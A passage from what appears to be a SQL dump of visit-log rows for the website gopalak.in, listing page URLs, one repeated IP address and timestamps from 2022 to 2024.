10:00:28'),(2129,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-15 01:25:24'),(2130,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-16 06:42:19'),(2131,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-17 06:13:38'),(2132,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-17 14:58:11'),(2133,0,0,1,1755,1,'https://gopalak.in/my-account/','3.110.242.160','','','','2022-10-19 04:53:07'),(2134,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-19 05:54:06'),(2135,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-19 06:38:38'),(2136,1,0,0,0,1,'https://gopalak.in/?preview_id=1373&preview_nonce=23abec9797&preview=true','3.110.242.160','','','','2022-10-19 10:02:02'),(2137,1,0,0,0,1,'https://gopalak.in/donate/','3.110.242.160','','','','2022-10-19 12:27:06'),(2138,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-20 04:18:41'),(2139,1,0,0,0,1,'https://gopalak.in/aboutus/?preview_id=1804&preview_nonce=084352c7cf&preview=true','3.110.242.160','','','','2022-10-20 05:43:00'),(2140,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-20 09:43:22'),(2141,1,0,0,0,1,'https://gopalak.in/?preview_id=1373&preview_nonce=f6b49d9d15&preview=true','3.110.242.160','','','','2022-10-20 11:35:16'),(2142,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-25 04:50:26'),(2143,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-27 05:58:08'),(2144,9,0,0,136,1,'https://gopalak.in/shop/','3.110.242.160','','','','2022-10-27 06:12:34'),(2145,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-27 12:01:17'),(2146,1,0,0,0,1,'https://gopalak.in/donate/','3.110.242.160','','','','2022-10-27 12:02:48'),(2147,1,0,0,0,1,'https://gopalak.in/donate/','3.110.242.160','','','','2022-10-27 12:39:18'),(2148,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-28 04:07:53'),(2149,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-28 05:01:33'),(2150,1,0,0,0,1,'https://gopalak.in/?preview_id=1373&preview_nonce=ddd4453b73&preview=true','3.110.242.160','','','','2022-10-28 06:36:01'),(2151,1,0,0,0,1,'www.ask.com','3.110.242.160','','','','2022-11-01 22:36:58'),(2152,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-11-07 05:20:22'),(2153,1,0,0,0,1,'','3.110.242.160','','','','2022-11-11 20:37:52'),(2154,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-11-16 11:28:07'),(2155,1,0,0,0,1,'','3.110.242.160','','','','2022-11-17 04:41:35'),(2156,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-11-22 06:51:44'),(2157,9,0,0,136,1,'https://gopalak.in/shop/','3.110.242.160','','','','2022-11-22 06:52:36'),(2158,1,0,0,0,1,'','3.110.242.160','','','','2022-11-25 08:37:32'),(2159,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-12-30 05:08:30'),(2160,1,0,0,0,1,'www.ecosia.org','3.110.242.160','','','','2022-12-31 22:28:15'),(2161,1,0,0,0,1,'','3.110.242.160','','','','2023-01-02 12:36:32'),(2162,1,0,0,0,1,'','3.110.242.160','','','','2023-01-10 19:08:55'),(2163,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2023-01-20 09:33:45'),(2164,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2023-01-23 10:17:14'),(2165,1,0,0,0,1,'','3.110.242.160','','','','2023-01-24 03:31:41'),(2166,1,0,0,0,1,'','3.110.242.160','','','','2023-02-06 02:23:36'),(2167,1,0,0,0,1,'','3.110.242.160','','','','2023-02-12 05:02:54'),(2168,1,0,0,0,1,'','3.110.242.160','','','','2023-02-23 13:50:31'),(2169,1,0,0,0,1,'','3.110.242.160','','','','2023-03-04 21:24:46'),(2170,1,0,0,0,1,'','3.110.242.160','','','','2023-03-10 11:35:55'),(2171,1,0,0,0,1,'','3.110.242.160','','','','2023-03-11 18:45:30'),(2172,1,0,0,0,1,'','3.110.242.160','','','','2023-03-13 12:54:01'),(2173,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-03-15 14:28:13'),(2174,1,0,0,0,1,'http://gopalak.in/','3.110.242.160','','','','2023-03-16 12:43:47'),(2175,0,0,1,1755,1,'https://gopalak.in/shop/','3.110.242.160','','','','2023-03-16 12:44:06'),(2176,1,0,0,0,1,'','3.110.242.160','','','','2023-03-16 14:36:26'),(2177,9,0,0,136,1,'','3.110.242.160','','','','2023-03-16 20:10:19'),(2178,9,0,0,135,1,'','3.110.242.160','','','','2023-03-16 20:10:23'),(2179,9,0,0,85,1,'','3.110.242.160','','','','2023-03-16 20:10:26'),(2180,0,0,1,1775,1,'','3.110.242.160','','','','2023-03-16 20:10:29'),(2181,0,0,1,1786,1,'','3.110.242.160','','','','2023-03-16 20:10:33'),(2182,0,0,1,1755,1,'','3.110.242.160','','','','2023-03-16 20:10:36'),(2183,1,0,0,0,1,'','3.110.242.160','','','','2023-03-16 20:10:39'),(2184,1,0,0,0,1,'','3.110.242.160','','','','2023-03-16 20:10:42'),(2185,1,0,0,0,1,'','3.110.242.160','','','','2023-03-16 20:10:45'),(2186,9,0,0,136,1,'','3.110.242.160','','','','2023-03-17 00:06:47'),(2187,9,0,0,136,1,'','3.110.242.160','','','','2023-03-17 00:06:57'),(2188,9,0,0,135,1,'','3.110.242.160','','','','2023-03-17 00:07:21'),(2189,0,0,1,1775,1,'','3.110.242.160','','','','2023-03-17 00:07:45'),(2190,0,0,1,1755,1,'','3.110.242.160','','','','2023-03-17 00:07:56'),(2191,9,0,0,135,1,'','3.110.242.160','','','','2023-03-19 18:11:11'),(2192,1,0,0,0,1,'','3.110.242.160','','','','2023-03-22 01:38:49'),(2193,9,0,0,135,1,'https://gopalak.in/pricing-policy/','3.110.242.160','','','','2023-03-27 08:05:41'),(2194,9,0,0,135,1,'https://gopalak.in/product-category/organic-fertilizer-repellent/','3.110.242.160','','','','2023-03-27 09:16:27'),(2195,1,0,0,0,1,'','3.110.242.160','','','','2023-04-01 02:48:57'),(2196,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-04-14 10:23:36'),(2197,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-04-14 19:52:03'),(2198,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-04-17 09:36:12'),(2199,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-04-17 15:37:10'),(2200,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-04-17 16:45:47'),(2201,1,0,0,0,1,'','3.110.242.160','','','','2023-04-23 18:28:57'),(2202,0,0,1,1786,1,'','3.110.242.160','','','','2023-04-23 18:50:27'),(2203,0,0,1,1755,1,'','3.110.242.160','','','','2023-04-23 18:53:43'),(2204,0,0,1,1775,1,'','3.110.242.160','','','','2023-04-23 18:54:59'),(2205,9,0,0,135,1,'','3.110.242.160','','','','2023-04-23 18:55:08'),(2206,9,0,0,136,1,'','3.110.242.160','','','','2023-04-23 18:56:16'),(2207,9,0,0,85,1,'','3.110.242.160','','','','2023-04-23 19:01:02'),(2208,1,0,0,0,1,'','3.110.242.160','','','','2023-04-26 17:02:21'),(2209,0,0,1,1786,1,'','3.110.242.160','','','','2023-04-28 20:36:03'),(2210,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-05-06 07:55:10'),(2211,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-05-06 10:50:28'),(2212,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-05-06 13:54:33'),(2213,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-05-06 17:05:48'),(2214,1,0,0,0,1,'','3.110.242.160','','','','2023-05-10 00:03:33'),(2215,1,0,0,0,1,'','3.110.242.160','','','','2023-05-10 14:37:18'),(2216,0,0,1,1775,1,'','3.110.242.160','','','','2023-05-10 21:14:01'),(2217,1,0,0,0,1,'','3.110.242.160','','','','2023-05-15 08:18:54'),(2218,1,0,0,0,1,'','3.110.242.160','','','','2023-05-21 14:12:55'),(2219,1,0,0,0,1,'','3.110.242.160','','','','2023-05-22 15:31:27'),(2220,1,0,0,0,1,'','3.110.242.160','','','','2023-05-22 17:07:08'),(2221,9,0,0,135,1,'','3.110.242.160','','','','2023-05-22 17:46:09'),(2222,9,0,0,85,1,'','3.110.242.160','','','','2023-05-22 17:46:10'),(2223,9,0,0,136,1,'','3.110.242.160','','','','2023-05-22 17:46:10'),(2224,0,0,1,1755,1,'','3.110.242.160','','','','2023-05-22 17:46:21'),(2225,0,0,1,1775,1,'','3.110.242.160','','','','2023-05-22 17:46:22'),(2226,0,0,1,1786,1,'','3.110.242.160','','','','2023-05-22 17:46:22'),(2227,0,0,1,1775,1,'','3.110.242.160','','','','2023-05-22 17:59:28'),(2228,0,0,1,1786,1,'','3.110.242.160','','','','2023-05-22 17:59:29'),(2229,0,0,1,1755,1,'','3.110.242.160','','','','2023-05-22 17:59:31'),(2230,9,0,0,136,1,'','3.110.242.160','','','','2023-05-27 01:27:46'),(2231,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2023-05-27 17:42:48'),(2232,0,0,1,1755,1,'','3.110.242.160','','','','2023-06-03 16:09:19'),(2233,0,0,1,1775,1,'','3.110.242.160','','','','2023-06-03 17:09:17'),(2234,0,0,1,1786,1,'','3.110.242.160','','','','2023-06-03 17:39:19'),(2235,1,0,0,0,1,'','3.110.242.160','','','','2023-06-06 21:40:07'),(2236,1,0,0,0,1,'','3.110.242.160','','','','2023-06-10 06:19:41'),(2237,1,0,0,0,1,'','3.110.242.160','','','','2023-06-14 22:02:27'),(2238,1,0,0,0,1,'','3.110.242.160','','','','2023-06-16 03:28:58'),(2239,1,0,0,0,1,'','3.110.242.160','','','','2023-06-18 06:47:59'),(2240,1,0,0,0,1,'','3.110.242.160','','','','2023-06-19 11:02:46'),(2241,1,0,0,0,1,'','3.110.242.160','','','','2023-06-23 15:46:44'),(2242,1,0,0,0,1,'','3.110.242.160','','','','2023-06-25 01:13:41'),(2243,1,0,0,0,1,'','3.110.242.160','','','','2023-06-26 23:38:11'),(2244,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-07-01 09:33:11'),(2245,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-07-01 12:22:46'),(2246,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-07-01 13:24:08'),(2247,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-07-01 15:30:20'),(2248,9,0,0,136,1,'','3.110.242.160','','','','2023-07-03 12:47:32'),(2249,1,0,0,0,1,'','3.110.242.160','','','','2023-07-09 15:00:38'),(2250,1,0,0,0,1,'','3.110.242.160','','','','2023-07-13 12:15:19'),(2251,1,0,0,0,1,'','3.110.242.160','','','','2023-07-16 01:08:40'),(2252,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2023-07-18 05:21:37'),(2253,1,0,0,0,1,'','3.110.242.160','','','','2023-07-31 12:33:45'),(2254,1,0,0,0,1,'','3.110.242.160','','','','2023-07-31 21:43:56'),(2255,1,0,0,0,1,'','3.110.242.160','','','','2023-08-02 15:27:54'),(2256,9,0,0,136,1,'','3.110.242.160','','','','2023-08-02 17:31:56'),(2257,9,0,0,135,1,'','3.110.242.160','','','','2023-08-02 17:31:58'),(2258,9,0,0,85,1,'','3.110.242.160','','','','2023-08-02 17:32:02'),(2259,0,1,0,0,21,'','3.110.242.160','','','','2023-08-09 05:53:15'),(2260,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-08-09 08:04:43'),(2261,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-08-09 09:46:03'),(2262,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-08-09 10:52:28'),(2263,1,0,0,0,1,'','3.110.242.160','','','','2023-08-11 09:57:23'),(2264,9,0,0,136,1,'','3.110.242.160','','','','2023-08-14 01:43:48'),(2265,9,0,0,136,1,'','3.110.242.160','','','','2023-08-14 02:04:47'),(2266,1,0,0,0,1,'','3.110.242.160','','','','2023-08-14 07:49:18'),(2267,1,0,0,0,1,'','3.110.242.160','','','','2023-08-15 04:20:35'),(2268,1,0,0,0,1,'','3.110.242.160','','','','2023-08-17 00:19:31'),(2269,1,0,0,0,1,'','3.110.242.160','','','','2023-08-17 10:44:28'),(2270,1,0,0,0,1,'','3.110.242.160','','','','2023-08-17 12:51:28'),(2271,1,0,0,0,1,'','3.110.242.160','','','','2023-08-19 15:51:09'),(2272,1,0,0,0,1,'','3.110.242.160','','','','2023-08-24 08:45:59'),(2273,0,0,1,1775,1,'','3.110.242.160','','','','2023-08-24 14:12:28'),(2274,1,0,0,0,1,'','3.110.242.160','','','','2023-08-25 04:07:42'),(2275,0,0,1,1786,1,'','3.110.242.160','','','','2023-08-25 20:31:46'),(2276,1,0,0,0,1,'','3.110.242.160','','','','2023-08-25 20:32:20'),(2277,9,0,0,135,1,'','3.110.242.160','','','','2023-08-25 20:32:42'),(2278,1,0,0,0,1,'','3.110.242.160','','','','2023-08-25 23:30:31'),(2279,1,0,0,0,1,'','3.110.242.160','','','','2023-08-27 02:11:36'),(2280,1,0,0,0,1,'','3.110.242.160','','','','2023-08-27 21:07:36'),(2281,1,0,0,0,1,'','3.110.242.160','','','','2023-08-28 02:48:21'),(2282,1,0,0,0,1,'','3.110.242.160','','','','2023-08-28 23:18:56'),(2283,1,0,0,0,1,'','3.110.242.160','','','','2023-08-29 19:49:31'),(2284,1,0,0,0,1,'','3.110.242.160','','','','2023-09-01 16:26:31'),(2285,9,0,0,85,1,'','3.110.242.160','','','','2023-09-04 00:25:31'),(2286,1,0,0,0,1,'','3.110.242.160','','','','2023-09-04 05:47:54'),(2287,1,0,0,0,1,'','3.110.242.160','','','','2023-09-05 00:04:59'),(2288,0,0,1,1755,1,'','3.110.242.160','','','','2023-09-05 03:04:24'),(2289,1,0,0,0,1,'','3.110.242.160','','','','2023-09-06 09:46:34'),(2290,1,0,0,0,1,'','3.110.242.160','','','','2023-09-07 03:40:13'),(2291,1,0,0,0,1,'','3.110.242.160','','','','2023-09-07 03:58:37'),(2292,1,0,0,0,1,'','3.110.242.160','','','','2023-09-07 08:09:05'),(2293,1,0,0,0,1,'','3.110.242.160','','','','2023-09-07 20:26:57'),(2294,1,0,0,0,1,'','3.110.242.160','','','','2023-09-11 19:21:22'),(2295,1,0,0,0,1,'','3.110.242.160','','','','2023-09-12 19:00:38'),(2296,1,0,0,0,1,'','3.110.242.160','','','','2023-09-14 06:45:26'),(2297,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-09-15 08:52:34'),(2298,1,0,0,0,1,'','3.110.242.160','','','','2023-09-15 11:33:46'),(2299,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-09-15 13:55:23'),(2300,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-09-15 22:12:10'),(2301,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-09-16 03:53:59'),(2302,1,0,0,0,1,'','3.110.242.160','','','','2023-09-16 11:06:22'),(2303,1,0,0,0,1,'','3.110.242.160','','','','2023-09-18 11:06:14'),(2304,1,0,0,0,1,'','3.110.242.160','','','','2023-09-19 09:00:25'),(2305,0,1,0,0,21,'','3.110.242.160','','','','2023-09-19 17:10:55'),(2306,1,0,0,0,1,'','3.110.242.160','','','','2023-09-20 23:51:47'),(2307,1,0,0,0,1,'','3.110.242.160','','','','2023-09-24 17:33:07'),(2308,1,0,0,0,1,'','3.110.242.160','','','','2023-09-25 12:53:52'),(2309,1,0,0,0,1,'','3.110.242.160','','','','2023-09-27 12:15:05'),(2310,9,0,0,85,1,'','3.110.242.160','','','','2023-10-02 10:07:13'),(2311,1,0,0,0,1,'','3.110.242.160','','','','2023-10-02 10:07:21'),(2312,1,0,0,0,1,'','3.110.242.160','','','','2023-10-02 10:07:25'),(2313,1,0,0,0,1,'','3.110.242.160','','','','2023-10-02 10:07:25'),(2314,1,0,0,0,1,'','3.110.242.160','','','','2023-10-02 10:07:26'),(2315,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-10-02 17:11:35'),(2316,1,0,0,0,1,'','3.110.242.160','','','','2023-10-03 00:24:50'),(2317,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-10-03 06:51:28'),(2318,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-10-03 07:49:39'),(2319,1,0,0,0,1,'','3.110.242.160','','','','2023-10-04 05:34:51'),(2320,1,0,0,0,1,'','3.110.242.160','','','','2023-10-05 01:43:39'),(2321,9,0,0,136,1,'','3.110.242.160','','','','2023-10-06 08:17:33'),(2322,1,0,0,0,1,'','3.110.242.160','','','','2023-10-08 02:01:54'),(2323,1,0,0,0,1,'','3.110.242.160','','','','2023-10-08 13:33:46'),(2324,1,0,0,0,1,'','3.110.242.160','','','','2023-10-10 11:00:10'),(2325,1,0,0,0,1,'','3.110.242.160','','','','2023-10-12 20:41:32'),(2326,1,0,0,0,1,'','3.110.242.160','','','','2023-10-12 20:42:21'),(2327,1,0,0,0,1,'','3.110.242.160','','','','2023-10-13 20:31:13'),(2328,1,0,0,0,1,'','3.110.242.160','','','','2023-10-14 00:07:38'),(2329,1,0,0,0,1,'','3.110.242.160','','','','2023-10-15 09:50:19'),(2330,1,0,0,0,1,'','3.110.242.160','','','','2023-10-16 06:26:17'),(2331,1,0,0,0,1,'','3.110.242.160','','','','2023-10-17 09:54:15'),(2332,1,0,0,0,1,'','3.110.242.160','','','','2023-10-18 01:33:29'),(2333,1,0,0,0,1,'','3.110.242.160','','','','2023-10-19 07:16:54'),(2334,1,0,0,0,1,'','3.110.242.160','','','','2023-10-20 17:54:58'),(2335,1,0,0,0,1,'','3.110.242.160','','','','2023-10-21 04:07:21'),(2336,9,0,0,136,1,'https://gopalak.in/my-account/','3.110.242.160','','','','2023-10-22 06:34:49'),(2337,1,0,0,0,1,'','3.110.242.160','','','','2023-10-23 14:58:42'),(2338,1,0,0,0,1,'','3.110.242.160','','','','2023-10-25 04:19:26'),(2339,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-10-25 05:57:15'),(2340,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-10-25 07:09:42'),(2341,1,0,0,0,1,'','3.110.242.160','','','','2023-10-26 20:03:57'),(2342,1,0,0,0,1,'','3.110.242.160','','','','2023-10-27 10:52:25'),(2343,1,0,0,0,1,'','3.110.242.160','','','','2023-10-29 05:49:25'),(2344,9,0,0,85,1,'','3.110.242.160','','','','2023-10-29 19:54:01'),(2345,1,0,0,0,1,'','3.110.242.160','','','','2023-10-31 14:08:03'),(2346,1,0,0,0,1,'','3.110.242.160','','','','2023-10-31 18:53:30'),(2347,1,0,0,0,1,'','3.110.242.160','','','','2023-11-01 00:32:43'),(2348,1,0,0,0,1,'','3.110.242.160','','','','2023-11-02 10:58:38'),(2349,1,0,0,0,1,'','3.110.242.160','','','','2023-11-06 18:54:23'),(2350,1,0,0,0,1,'','3.110.242.160','','','','2023-11-11 20:15:50'),(2351,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-11-16 17:35:30'),(2352,1,0,0,0,1,'','3.110.242.160','','','','2023-11-22 05:41:42'),(2353,1,0,0,0,1,'','3.110.242.160','','','','2023-11-26 12:06:41'),(2354,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-11-29 23:07:41'),(2355,9,0,0,136,1,'','3.110.242.160','','','','2023-12-07 06:52:35'),(2356,1,0,0,0,1,'','3.110.242.160','','','','2023-12-12 15:44:03'),(2357,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-15 10:30:07'),(2358,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-15 19:28:16'),(2359,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-16 13:54:37'),(2360,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-16 19:17:25'),(2361,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-17 01:11:00'),(2362,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-17 07:17:40'),(2363,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-17 09:03:33'),(2364,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-17 12:50:50'),(2365,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-17 19:16:36'),(2366,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-18 02:09:13'),(2367,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2023-12-18 04:38:14'),(2368,1,0,0,0,1,'','3.110.242.160','','','','2023-12-22 07:24:50'),(2369,1,0,0,0,1,'','3.110.242.160','','','','2023-12-28 17:04:50'),(2370,1,0,0,0,1,'','3.110.242.160','','','','2023-12-30 03:54:50'),(2371,0,0,1,1786,1,'','3.110.242.160','','','','2023-12-30 03:54:52'),(2372,1,0,0,0,1,'','3.110.242.160','','','','2023-12-30 03:54:56'),(2373,9,0,0,135,1,'','3.110.242.160','','','','2023-12-30 03:54:57'),(2374,9,0,0,135,1,'','3.110.242.160','','','','2023-12-30 03:54:59'),(2375,0,0,1,1775,1,'','3.110.242.160','','','','2023-12-30 03:55:01'),(2376,1,0,0,0,1,'','3.110.242.160','','','','2023-12-30 03:55:03'),(2377,9,0,0,85,1,'','3.110.242.160','','','','2023-12-30 03:55:04'),(2378,9,0,0,136,1,'','3.110.242.160','','','','2023-12-30 03:55:06'),(2379,9,0,0,136,1,'','3.110.242.160','','','','2023-12-30 03:55:08'),(2380,9,0,0,136,1,'','3.110.242.160','','','','2023-12-30 03:55:10'),(2381,0,0,1,1755,1,'','3.110.242.160','','','','2023-12-30 03:55:12'),(2382,0,0,1,1755,1,'','3.110.242.160','','','','2023-12-30 03:55:15'),(2383,1,0,0,0,1,'','3.110.242.160','','','','2024-01-02 18:05:03'),(2384,9,0,0,85,1,'','3.110.242.160','','','','2024-01-02 18:05:05'),(2385,0,0,1,1786,1,'','3.110.242.160','','','','2024-01-02 18:05:05'),(2386,9,0,0,135,1,'','3.110.242.160','','','','2024-01-02 18:05:10'),(2387,1,0,0,0,1,'','3.110.242.160','','','','2024-01-02 18:05:10'),(2388,9,0,0,135,1,'','3.110.242.160','','','','2024-01-02 18:05:12'),(2389,0,0,1,1775,1,'','3.110.242.160','','','','2024-01-02 18:05:14'),(2390,1,0,0,0,1,'','3.110.242.160','','','','2024-01-02 18:05:16'),(2391,9,0,0,136,1,'','3.110.242.160','','','','2024-01-02 18:05:19'),(2392,9,0,0,136,1,'','3.110.242.160','','','','2024-01-02 18:05:21'),(2393,9,0,0,136,1,'','3.110.242.160','','','','2024-01-02 18:05:21'),(2394,0,0,1,1755,1,'','3.110.242.160','','','','2024-01-02 18:05:23'),(2395,0,0,1,1755,1,'','3.110.242.160','','','','2024-01-02 18:05:26'),(2396,1,0,0,0,1,'','3.110.242.160','','','','2024-01-05 18:35:14'),(2397,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-07 19:55:01'),(2398,1,0,0,0,1,'','3.110.242.160','','','','2024-01-07 21:44:48'),(2399,0,0,1,1775,1,'','3.110.242.160','','','','2024-01-07 23:12:01'),(2400,0,0,1,1755,1,'','3.110.242.160','','','','2024-01-07 23:12:03'),(2401,0,0,1,1786,1,'','3.110.242.160','','','','2024-01-07 23:12:08'),(2402,9,0,0,85,1,'','3.110.242.160','','','','2024-01-07 23:12:10'),(2403,9,0,0,136,1,'','3.110.242.160','','','','2024-01-07 23:12:12'),(2404,9,0,0,135,1,'','3.110.242.160','','','','2024-01-07 23:12:15'),(2405,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-08 23:08:11'),(2406,1,0,0,0,1,'https://gopalak.in/shop/','3.110.242.160','','','','2024-01-10 01:05:27'),(2407,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-11 02:31:45'),(2408,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-12 20:21:31'),(2409,1,0,0,0,1,'','3.110.242.160','','','','2024-01-13 02:41:34'),(2410,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-14 12:52:27'),(2411,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-14 15:05:54'),(2412,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-14 17:18:44'),(2413,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-15 00:16:45'),(2414,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-15 02:46:10'),(2415,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-15 05:17:44'),(2416,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-15 10:10:06'),(2417,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-15 17:33:08'),(2418,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-15 22:22:35'),(2419,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-16 03:24:21'),(2420,1,0,0,0,1,'','3.110.242.160','','','','2024-01-17 16:12:46'),(2421,1,0,0,0,1,'','3.110.242.160','','','','2024-01-18 07:00:28'),(2422,1,0,0,0,1,'http://gopalak.in/shop/','3.110.242.160','','','','2024-01-28 09:05:35'),(2423,9,0,0,135,1,'','3.110.242.160','','','','2024-01-28 10:16:16'),(2424,0,0,1,1755,1,'http://gopalak.in/product/cow/','3.110.242.160','','','','2024-01-28 18:12:56'),(2425,9,0,0,85,1,'http://gopalak.in/product-tag/pre-order/','3.110.242.160','','','','2024-01-28 22:13:21'),(2426,0,0,1,1786,1,'http://gopalak.in/product/cattle/','3.110.242.160','','','','2024-01-28 23:14:09'),(2427,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-01-29 00:13:16'),(2428,9,0,0,136,1,'http://gopalak.in/product-category/donation/','3.110.242.160','','','','2024-01-29 06:00:18'),(2429,9,0,0,135,1,'http://gopalak.in/product-category/organic-fertilizer-repellent/','3.110.242.160','','','','2024-01-29 07:33:47'),(2430,0,0,1,1775,1,'http://gopalak.in/product/abc/','3.110.242.160','','','','2024-01-29 10:52:51'),(2431,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-01-29 22:18:51'),(2432,1,0,0,0,1,'http://gopalak.in/shop/?add-to-cart=1755','3.110.242.160','','','','2024-01-30 00:14:55'),(2433,1,0,0,0,1,'http://gopalak.in/shop/?add-to-cart=1786','3.110.242.160','','','','2024-01-30 04:37:00'),(2434,1,0,0,0,1,'http://gopalak.in/shop/?add-to-cart=1775','3.110.242.160','','','','2024-01-30 05:10:53'),(2435,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-01-31 01:46:28'),(2436,1,0,0,0,1,'','3.110.242.160','','','','2024-01-31 05:12:15'),(2437,9,0,0,136,1,'http://gopalak.in/product-category/donation/?add-to-cart=1775','3.110.242.160','','','','2024-02-01 03:17:44'),(2438,9,0,0,135,1,'http://gopalak.in/product-category/organic-fertilizer-repellent/?add-to-cart=1786','3.110.242.160','','','','2024-02-01 19:12:32'),(2439,1,0,0,0,1,'','3.110.242.160','','','','2024-02-03 01:27:23'),(2440,9,0,0,136,1,'http://gopalak.in/product-category/donation/?add-to-cart=1755','3.110.242.160','','','','2024-02-03 22:38:59'),(2441,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-02-04 19:06:54'),(2442,1,0,0,0,1,'','3.110.242.160','','','','2024-02-06 01:38:32'),(2443,1,0,0,0,1,'','3.110.242.160','','','','2024-02-07 10:43:51'),(2444,0,0,1,1786,1,'','3.110.242.160','','','','2024-02-13 18:32:51'),(2445,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2024-02-14 15:44:14'),(2446,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-02-15 15:49:00'),(2447,1,0,0,0,1,'','3.110.242.160','','','','2024-02-22 14:44:14'),(2448,1,0,0,0,1,'','3.110.242.160','','','','2024-02-24 04:17:42'),(2449,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-02-26 13:48:42'),(2450,1,0,0,0,1,'','3.110.242.160','','','','2024-03-01 18:54:58'),(2451,1,0,0,0,1,'','3.110.242.160','','','','2024-03-05 15:54:57'),(2452,1,0,0,0,1,'','3.110.242.160','','','','2024-03-13 16:32:43'),(2453,9,0,0,136,1,'','3.110.242.160','','','','2024-03-13 